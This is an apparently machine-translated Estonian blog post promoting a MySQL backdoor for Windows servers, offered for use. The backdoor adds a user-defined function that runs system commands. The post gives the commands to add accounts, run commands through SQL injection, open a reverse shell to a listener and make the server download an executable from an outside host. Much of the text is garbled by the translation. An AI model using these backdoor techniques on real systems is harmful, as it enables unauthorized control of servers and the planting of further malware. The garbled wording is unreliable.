Mysql BackDoor
Allikas: Puri Manchester
Mysql BackDoor oli tagaukse arendamiseks PHP + Mysql server MySQL pärast tagaukse installida lisada "riigi" funktsioon on võimalik täita süsteemi käske, ja alustada MySQL protsess, mis põhineb DLL Narkomaani tüüpi tagaukse nutikalt realiseerida ei ole sadamas, ei ole protsess, mitte teenuseid läbi seina Trooja. programmi WINXP WIN2003 + MYSQL5.0.X ja all pass.
Paigaldamine Mysql.php levinud PHP server kohaselt täita Host-User-Password-DB, kliki "auto-installida MySQL tagauks"
Pärast edukat paigaldamist, Mysql suureneks "riik" funktsioon, samal ajal kui Mysql protsess töötab nuusutamisel tagaukse see tagauks Windows on sama süsteemi privileege ja MySQL.
Kasutamist riiklike ülesannete
Riigi funktsioon on tegelikult PHP süsteem () "funktsiooni sama funktsiooni saab täita süsteemi käske. Palun sisesta SQL käsk:" Office ja täida mysql avaldus, mis tuleb täita, nagu "vali riik (" net user nohack / add "), siis vajuta" Execute SQL kestab tulemusi.
Riigiga funktsioon põhineb Sniff tagaukse, isegi kui WebShell kadunud, kui server, SQL süst punkti saame läbi süsti. Php? Id = 1 ja riik ("net user") "meetod käivitab serveris käsk. Kui süvainjekteerimise kas pole? me ikka helistada Sniff tagaukse kontrolli server. saata mis tahes sadamasse server ja avatud Mysql-"alguses pakettaknad, saab helistada Sniff tagaukse, näiteks:
Töötab süsteem käsk: NC ip 80 -> Enter -> Mysql-cmd / c net kasutaja abc / add> c :/ log.txt (Märkus: viimane "!" Ei saa jätta)
2 20082 sadamas shell kohaliku server bounce: 1. jooksu nc-lp 20 082 jälgima masina 20082 port ja seejärel NC ip 80 -> Enter -> Mysql-c -> Enter
Lase server download: NC ip 80 -> Enter -> Mysql-http :/ / www.x.com / door.exe-c mydoor.exe (Märkus: viimane! "Ei saa jätta)
Lisaks saates "Mysql-c-", teine käsk ei kaja, kuid vastavaid käske server töötab.
Uninstall MySQL run "drop funktsiooni riik" saab maha, kuid samal ajal paneb mysql protsessi väljumiseks, normaliseeruvad pärast reboot.










































150 Trackback (s)
Sa pead olema sisse logitud , et kommenteerida.